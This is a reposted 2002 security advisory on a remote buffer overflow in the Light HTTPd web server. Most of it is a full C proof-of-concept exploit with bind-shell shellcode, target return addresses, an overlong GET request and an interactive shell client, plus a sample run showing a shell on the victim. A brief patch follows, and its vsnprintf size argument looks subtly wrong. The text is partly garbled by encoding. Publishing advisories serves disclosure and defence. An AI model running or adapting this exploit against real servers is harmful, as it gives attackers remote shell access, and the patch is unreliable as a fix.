Remote Buffer Overflow vulnerability in Light HTTPd

2002-11-12T00:00:00
ID SECURITYVULNS:DOC:3745
Type securityvulns
Reporter Securityvulns
Modified 2002-11-12T00:00:00

Description

    ========================================
    INetCop Security Advisory #2002-0x82-002
    ========================================
  • Title: Remote Buffer Overflow vulnerability in Light HTTPd.

0x01. Description

Lhttpd that is improved in ghttpd for more convenient and strong webserver, is webserver that offer several functions. Vulnerability that attacker can get shell in remote easily of this webserver exists. This vulnerability resembles closely very with ghttpd vulnerability before.

0x02. Vulnerable Packages

Vendor site: http://lhttpd.sourceforge.net/

lhttpdwin0.1 -lhttpd0.1-win.zip +Microsoft Windows

lhttpd-0.1 -lhttpd-0.1.tar.gz +AIX +BSD +GNU Hurd +HP-UX +IRIX +Linux +SCO +SunOS/Solaris +Other

0x03. Exploit

This's exploit code that prove. Through remote attack, get 'nobody' competence.

=== 0x82-Remote.lhttpdxpl.c ===

/ Proof of Concept LIGHT HTTPd Remote exploit by Xpl017Elz __ Testing exploit: bash$ ./0x82-Remote.lhttpdxpl -h 61.37.xx.xx -t 3 Proof of Concept LIGHT HTTPd Remote exploit by Xpl017Elz
Try `./0x82-Remote.lhttpdxpl -?' for more information. [1] Make shellcode. [2] Send exploit (bindshell) code. [3] Waiting, executes the shell ! [4] Trying 61.37.xx.xx:36864 ... [5] Connected to 61.37.xx.xx:36864 ! [
] It's shell ! :-) Linux testsub 2.4.2-3 #1 Sun Jun 24 01:31:37 KST 2001 i686 unknown uid=99(nobody) gid=99(nobody) groups=0(root),1(bin),2(daemon),3(sys), 4(adm),6(disk),10(wheel) exit bash$ -- exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>. My World: http://x82.i21c.net Special Greets: INetCop team. * /

include <stdio.h>

include <unistd.h>

include <getopt.h>

include <netdb.h>

include <netinet/in.h>

define HOST "localhost"

define PORT 3000

struct os { int num; char *os; int offset; unsigned long shaddr; int atlen; };

struct os plat[] = { / olny test / {0,"RedHat Linux 6.x localhost lhttpd",1,0xbfffb744,160}, {1,"RedHat Linux 6.x remote lhttpd",0,0xbfffb608,150}, {2,"RedHat Linux 7.x localhost lhttpd",3,0xbfffb650,150}, {3,"RedHat Linux 7.x remote lhttpd",2,0xbfffb650,160}, {4,NULL,0,0} };

int setsock(char hostname,int port); void getshell(int sock); void usage(char args); void banrl(char args); int main(int argc,char argv[]) { int sockfd1; int sockfd2; int ax82,bx82,cx82,dx82; int type=0; int port=PORT; int atlen=plat[type].atlen; int off=plat[type].offset; char offbuf[10]; char hostname[0x82]=HOST;

char ptbind[] = /* BIND SHELL ON PORT TCP/36864 */
    //------------------- main: -------------------//
    &quot;&#92;xeb&#92;x72&quot;                        /* jmp callz */
    //------------------- start: ------------------//
    &quot;&#92;x5e&quot;                            /* popl &#37;esi */
    //------------------ socket&#40;&#41; -----------------//
    &quot;&#92;x29&#92;xc0&quot;                  /* subl &#37;eax, &#37;eax */
    &quot;&#92;x89&#92;x46&#92;x10&quot;        /* movl &#37;eax, 0x10&#40;&#37;esi&#41; */
    &quot;&#92;x40&quot;                            /* incl &#37;eax */
    &quot;&#92;x89&#92;xc3&quot;                  /* movl &#37;eax, &#37;ebx */
    &quot;&#92;x89&#92;x46&#92;x0c&quot;        /* movl &#37;eax, 0x0c&#40;&#37;esi&#41; */
    &quot;&#92;x40&quot;                            /* incl &#37;eax */
    &quot;&#92;x89&#92;x46&#92;x08&quot;        /* movl &#37;eax, 0x08&#40;&#37;esi&#41; */
    &quot;&#92;x8d&#92;x4e&#92;x08&quot;        /* leal 0x08&#40;&#37;esi&#41;, &#37;ecx */
    &quot;&#92;xb0&#92;x66&quot;                  /* movb $0x66, &#37;al */
    &quot;&#92;xcd&#92;x80&quot;                        /* int $0x80 */
    //------------------- bind&#40;&#41; ------------------//
    &quot;&#92;x43&quot;                            /* incl &#37;ebx */
    &quot;&#92;xc6&#92;x46&#92;x10&#92;x10&quot;   /* movb $0x10, 0x10&#40;&#37;esi&#41; */
    &quot;&#92;x66&#92;x89&#92;x5e&#92;x14&quot;     /* movw &#37;bx, 0x14&#40;&#37;esi&#41; */
    &quot;&#92;x88&#92;x46&#92;x08&quot;         /* movb &#37;al, 0x08&#40;&#37;esi&#41; */
    &quot;&#92;x29&#92;xc0&quot;                  /* subl &#37;eax, &#37;eax */
    &quot;&#92;x89&#92;xc2&quot;                  /* movl &#37;eax, &#37;edx */
    &quot;&#92;x89&#92;x46&#92;x18&quot;        /* movl &#37;eax, 0x18&#40;&#37;esi&#41; */
    &quot;&#92;xb0&#92;x90&quot;                  /* movb $0x90, &#37;al */
    &quot;&#92;x66&#92;x89&#92;x46&#92;x16&quot;     /* movw &#37;ax, 0x16&#40;&#37;esi&#41; */
    &quot;&#92;x8d&#92;x4e&#92;x14&quot;        /* leal 0x14&#40;&#37;esi&#41;, &#37;ecx */
    &quot;&#92;x89&#92;x4e&#92;x0c&quot;        /* movl &#37;ecx, 0x0c&#40;&#37;esi&#41; */
    &quot;&#92;x8d&#92;x4e&#92;x08&quot;        /* leal 0x08&#40;&#37;esi&#41;, &#37;ecx */
    &quot;&#92;xb0&#92;x66&quot;                  /* movb $0x66, &#37;al */
    &quot;&#92;xcd&#92;x80&quot;                        /* int $0x80 */
    //------------------ listen&#40;&#41; -----------------//
    &quot;&#92;x89&#92;x5e&#92;x0c&quot;        /* movl &#37;ebx, 0x0c&#40;&#37;esi&#41; */
    &quot;&#92;x43&quot;                            /* incl &#37;ebx */
    &quot;&#92;x43&quot;                            /* incl &#37;ebx */
    &quot;&#92;xb0&#92;x66&quot;                  /* movb $0x66, &#37;al */
    &quot;&#92;xcd&#92;x80&quot;                        /* int $0x80 */
    //------------------ accept&#40;&#41; -----------------//
    &quot;&#92;x89&#92;x56&#92;x0c&quot;        /* movl &#37;edx, 0x0c&#40;&#37;esi&#41; */
    &quot;&#92;x89&#92;x56&#92;x10&quot;        /* movl &#37;edx, 0x10&#40;&#37;esi&#41; */
    &quot;&#92;xb0&#92;x66&quot;                  /* movb $0x66, &#37;al */
    &quot;&#92;x43&quot;                            /* incl &#37;ebx */
    &quot;&#92;xcd&#92;x80&quot;                        /* int $0x80 */
    //---- dup2&#40;s, 0&#41;, dup2&#40;s, 1&#41;, dup2&#40;s, 2&#41; -----//
    &quot;&#92;x86&#92;xc3&quot;                   /* xchgb &#37;al, &#37;bl */
    &quot;&#92;xb0&#92;x3f&quot;                  /* movb $0x3f, &#37;al */
    &quot;&#92;x29&#92;xc9&quot;                  /* subl &#37;ecx, &#37;ecx */
    &quot;&#92;xcd&#92;x80&quot;                        /* int $0x80 */
    &quot;&#92;xb0&#92;x3f&quot;                  /* movb $0x3f, &#37;al */
    &quot;&#92;x41&quot;                            /* incl &#37;ecx */
    &quot;&#92;xcd&#92;x80&quot;                        /* int $0x80 */
    &quot;&#92;xb0&#92;x3f&quot;                  /* movb $0x3f, &#37;al */
    &quot;&#92;x41&quot;                            /* incl &#37;ecx */
    &quot;&#92;xcd&#92;x80&quot;                        /* int $0x80 */
    //------------------ execve&#40;&#41; -----------------//
    &quot;&#92;x88&#92;x56&#92;x07&quot;         /* movb &#37;dl, 0x07&#40;&#37;esi&#41; */
    &quot;&#92;x89&#92;x76&#92;x0c&quot;        /* movl &#37;esi, 0x0c&#40;&#37;esi&#41; */
    &quot;&#92;x87&#92;xf3&quot;                 /* xchgl &#37;esi, &#37;ebx */
    &quot;&#92;x8d&#92;x4b&#92;x0c&quot;        /* leal 0x0c&#40;&#37;ebx&#41;, &#37;ecx */
    &quot;&#92;xb0&#92;x0b&quot;                  /* movb $0x0b, &#37;al */
    &quot;&#92;xcd&#92;x80&quot;                        /* int $0x80 */
    //------------------- callz: ------------------//
    &quot;&#92;xe8&#92;x89&#92;xff&#92;xff&#92;xff&quot;           /* call start */
    &quot;/bin/sh&quot;; /* 128byte */

char atbuf[512];
char sendnrecv[1024];
unsigned long shcode=plat[type].shaddr;
ax82=bx82=cx82=dx82=0;

memset&#40;offbuf,0x00,10&#41;;
memset&#40;atbuf,0x00,512&#41;;
memset&#40;sendnrecv,0x00,1024&#41;;

&#40;void&#41;banrl&#40;argv[0]&#41;;

while&#40;&#40;dx82=getopt&#40;argc,argv,&quot;S:s:O:o:H:h:P:p:T:t:&quot;&#41;&#41;!=EOF&#41;
{
    switch&#40;dx82&#41;
    {
        case &#39;S&#39;:
        case &#39;s&#39;:
            shcode=strtoul&#40;optarg,NULL,0&#41;;
            break;

        case &#39;O&#39;:
        case &#39;o&#39;:
            off=atoi&#40;optarg&#41;;
            break;

        case &#39;H&#39;:
        case &#39;h&#39;:
            strncpy&#40;hostname,optarg,0x82&#41;;
            break;

        case &#39;P&#39;:
        case &#39;p&#39;:
            port=atoi&#40;optarg&#41;;
            break;

        case &#39;T&#39;:
        case &#39;t&#39;:
            type=atoi&#40;optarg&#41;;

            if&#40;type&lt;0 || type&gt;3&#41;
                usage&#40;argv[0]&#41;;

            off=plat[type].offset;
            shcode=plat[type].shaddr;
            atlen=plat[type].atlen;
            break;

        case &#39;?&#39;:
            usage&#40;argv[0]&#41;;
            break;
    }
}

while&#40;off&#41;
{
    off--;
    offbuf[off]=&#39;^&#39;;
}

fprintf&#40;stdout,&quot; [1] Make shellcode.&#92;n&quot;&#41;;
for&#40;ax82=0;ax82&lt;atlen-strlen&#40;ptbind&#41;;ax82++&#41;
    atbuf[ax82] = 0x90;

for&#40;bx82=0;bx82&lt;strlen&#40;ptbind&#41;;bx82++&#41;
    atbuf[ax82++]=ptbind[bx82];

for&#40;cx82=ax82;cx82&lt;ax82+0x32;cx82+=4&#41;
    *&#40;long *&#41;&amp;atbuf[cx82]=shcode;

snprintf&#40;sendnrecv,1024,&quot;GET /&#37;s&#37;s HTTP/1.0&#92;r&#92;n&#92;n&quot;,offbuf,atbuf&#41;;

fprintf&#40;stdout,&quot; [2] Send exploit &#40;bindshell&#41; code.&#92;n&quot;&#41;;
sockfd1=setsock&#40;hostname,port&#41;;
send&#40;sockfd1,sendnrecv,strlen&#40;sendnrecv&#41;,0&#41;;

fprintf&#40;stdout,&quot; [3] Waiting, executes the shell !&#92;n&quot;&#41;;
sleep&#40;3&#41;;

fprintf&#40;stdout,&quot; [4] Trying &#37;s:36864 ...&#92;n&quot;,hostname&#41;;
sockfd2=setsock&#40;hostname,36864&#41;;
fprintf&#40;stdout,&quot; [5] Connected to &#37;s:36864 !&#92;n&#92;n&quot;,hostname&#41;;
getshell&#40;sockfd2&#41;;

}

int setsock(char hostname,int port) { int sock; struct hostent sxp; struct sockaddr_in sxp_addr;

if&#40;&#40;sxp=gethostbyname&#40;hostname&#41;&#41;==NULL&#41;
{
    herror&#40;&quot;gethostbyname&#40;&#41; error&quot;&#41;;
    exit&#40;-1&#41;;
}
if&#40;&#40;sock=socket&#40;AF_INET,SOCK_STREAM,0&#41;&#41;==-1&#41;
{
    perror&#40;&quot;socket&#40;&#41; error&quot;&#41;;
    exit&#40;-1&#41;;
}

sxp_addr.sin_family=AF_INET;
sxp_addr.sin_port=htons&#40;port&#41;;
sxp_addr.sin_addr=*&#40;&#40;struct in_addr*&#41;sxp-&gt;h_addr&#41;;
bzero&#40;&amp;&#40;sxp_addr.sin_zero&#41;,8&#41;;

if&#40;connect&#40;sock,&#40;struct sockaddr *&#41;&amp;sxp_addr,sizeof&#40;struct sockaddr&#41;&#41;==-1&#41;
{
    perror&#40;&quot;connect&#40;&#41; error&quot;&#41;;
    exit&#40;-1&#41;;
}

return&#40;sock&#41;;

}

void getshell(int sock) { int died; char *command="uname -a;id\n"; char readbuf[1024]; fd_set rset;

memset&#40;readbuf,0x00,1024&#41;;

fprintf&#40;stdout,&quot; [*] It&#39;s shell ! :-&#41;&#92;n&#92;n&quot;&#41;;
send&#40;sock,command,strlen&#40;command&#41;,0&#41;;

for&#40;;;&#41;
{
    FD_ZERO&#40;&amp;rset&#41;;
    FD_SET&#40;sock,&amp;rset&#41;;
    FD_SET&#40;STDIN_FILENO,&amp;rset&#41;;
    select&#40;sock+1,&amp;rset,NULL,NULL,NULL&#41;;

    if&#40;FD_ISSET&#40;sock,&amp;rset&#41;&#41;
    {
        died=read&#40;sock,readbuf,1024&#41;;
        if&#40;died&lt;=0&#41;
        {
            exit&#40;0&#41;;
        }
        readbuf[died]=0;
        printf&#40;&quot;&#37;s&quot;,readbuf&#41;;
    }
    if&#40;FD_ISSET&#40;STDIN_FILENO,&amp;rset&#41;&#41;
    {
        died=read&#40;STDIN_FILENO,readbuf,1024&#41;;
        if&#40;died&gt;0&#41;
        {
            readbuf[died]=0;
            write&#40;sock,readbuf,died&#41;;
        }
    }
}
return;

}

void usage(char *args) { int x82; fprintf(stderr,"\n Default Usage: %s -[option] [arguments]\n\n",args); fprintf(stderr,"\t -h [hostname] - target host\n"); fprintf(stderr,"\t -p [port] - port number\n"); fprintf(stderr,"\t -s [addr] - &shellcode addr\n"); fprintf(stderr,"\t -o [offset] - offset\n"); fprintf(stderr,"\t -t [type] - type number\n\n"); fprintf(stderr," Example: %s -h localhost -p 3000 -t 1\n\n",args); fprintf(stdout,"\t * Select target type: \n\n"); for(x82=0;plat[x82].num<4;x82++) fprintf(stdout,"\t %d. %s\n",plat[x82].num,plat[x82].os); fprintf(stdout,"\n Happy Exploit !\n\n"); exit(0); }

void banrl(char *args) { fprintf(stdout,"\n Proof of Concept LIGHT HTTPd Remote exploit"); fprintf(stdout,"\n by Xpl017Elz\n\n"); fprintf(stdout," Try `%s -?' for more information.\n\n",args); }

=== eof ===

0x04. Patch

=== util.patch ===

--- util.c Mon Dec 24 09:43:29 2001 +++ util.c.patch Thu Oct 17 19:02:00 2002 @@ -220,7 +220,7 @@ va_list ap;

    va_start&#40;ap, format&#41;;           // format it all into temp
  • vsprintf(temp, format, ap);
  • vsnprintf(temp, strlen(temp), format, ap); va_end(ap);
    time &#40;&amp;t&#41;;
    

=== eof ===

P.S: Sorry, for my poor english.

-- By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com, xploit(at)hackermail(dot)com

INetCop Security Home: http://www.inetcop.org (Korean hacking game) My World: http://x82.i21c.net

GPG public key: http://wizard.underattack.co.kr/~x82/h0me/pr0file/x82.k3y

-- Get your free email from http://www.hackermail.com

Powered by Outblaze